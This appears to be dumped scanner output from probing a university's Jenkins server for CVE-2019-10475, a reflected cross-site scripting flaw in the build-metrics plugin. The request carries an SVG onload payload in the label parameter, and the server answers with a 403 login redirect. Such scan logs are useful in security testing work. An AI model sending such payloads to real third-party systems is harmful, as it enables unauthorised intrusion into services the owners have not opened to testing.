[CVE-2019-10475] Dumped HTTP request for https://pipeline.eresearch.unimelb.edu.au/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter&nodeFilteringType=ALL&nodeFilter&launcherFilteringType=ALL&launcherFilter&causeFilteringType=ALL&causeFilter&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search


GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter&nodeFilteringType=ALL&nodeFilter&launcherFilteringType=ALL&launcherFilter&causeFilteringType=ALL&causeFilter&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1
Host: pipeline.eresearch.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2019-10475] Dumped HTTP response https://pipeline.eresearch.unimelb.edu.au/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter&nodeFilteringType=ALL&nodeFilter&launcherFilteringType=ALL&launcherFilter&causeFilteringType=ALL&causeFilter&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search

HTTP/1.1 403 Forbidden
Connection: close
Content-Type: text/html;charset=utf-8
Date: Wed, 06 Aug 2025 15:18:12 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(12.0.22)
Set-Cookie: JSESSIONID.f9da2665=node01m9qdx1kfma1t165nsbdi4v58e2928.node0; Path=/; Secure; HttpOnly; SameSite=Lax
Strict-Transport-Security: max-age=63072000
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Hudson: 1.395
X-Jenkins: 2.516.1
X-Jenkins-Session: 529aec02

<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2Fplugin%2Fbuild-metrics%2FgetBuildStats%3Flabel%3D%2522%253E%253Csvg%252Fonload%253Dalert%281337%29%253E%26range%3D2%26rangeUnits%3DWeeks%26jobFilteringType%3DALL%26jobFilter%26nodeFilteringType%3DALL%26nodeFilter%26launcherFilteringType%3DALL%26launcherFilter%26causeFilteringType%3DALL%26causeFilter%26Jenkins-Crumb%3D4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%26json%3D%257B%2522label%2522%253A%2B%2522Search%2BResults%2522%252C%2B%2522range%2522%253A%2B%25222%2522%252C%2B%2522rangeUnits%2522%253A%2B%2522Weeks%2522%252C%2B%2522jobFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522jobNameRegex%2522%253A%2B%2522%2522%252C%2B%2522jobFilter%2522%253A%2B%2522%2522%252C%2B%2522nodeFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522nodeNameRegex%2522%253A%2B%2522%2522%252C%2B%2522nodeFilter%2522%253A%2B%2522%2522%252C%2B%2522launcherFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522launcherNameRegex%2522%253A%2B%2522%2522%252C%2B%2522launcherFilter%2522%253A%2B%2522%2522%252C%2B%2522causeFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522causeNameRegex%2522%253A%2B%2522%2522%252C%2B%2522causeFilter%2522%253A%2B%2522%2522%252C%2B%2522Jenkins-Crumb%2522%253A%2B%25224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%2522%257D%26Submit%3DSearch'/><script id='redirect' data-redirect-url='/login?from=%2Fplugin%2Fbuild-metrics%2FgetBuildStats%3Flabel%3D%2522%253E%253Csvg%252Fonload%253Dalert%281337%29%253E%26range%3D2%26rangeUnits%3DWeeks%26jobFilteringType%3DALL%26jobFilter%26nodeFilteringType%3DALL%26nodeFilter%26launcherFilteringType%3DALL%26launcherFilter%26causeFilteringType%3DALL%26causeFilter%26Jenkins-Crumb%3D4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%26json%3D%257B%2522label%2522%253A%2B%2522Search%2BResults%2522%252C%2B%2522range%2522%253A%2B%25222%2522%252C%2B%2522rangeUnits%2522%253A%2B%2522Weeks%2522%252C%2B%2522jobFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522jobNameRegex%2522%253A%2B%2522%2522%252C%2B%2522jobFilter%2522%253A%2B%2522%2522%252C%2B%2522nodeFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522nodeNameRegex%2522%253A%2B%2522%2522%252C%2B%2522nodeFilter%2522%253A%2B%2522%2522%252C%2B%2522launcherFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522launcherNameRegex%2522%253A%2B%2522%2522%252C%2B%2522launcherFilter%2522%253A%2B%2522%2522%252C%2B%2522causeFilteringType%2522%253A%2B%2522ALL%2522%252C%2B%2522causeNameRegex%2522%253A%2B%2522%2522%252C%2B%2522causeFilter%2522%253A%2B%2522%2522%252C%2B%2522Jenkins-Crumb%2522%253A%2B%25224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%2522%257D%26Submit%3DSearch' src='/static/529aec02/scripts/redirect.js'></script></head><body style='background-color:white; color:white;'>
Authentication required
<!--
-->

</body></html>                                                                                                                                                                                                                                                                                                            
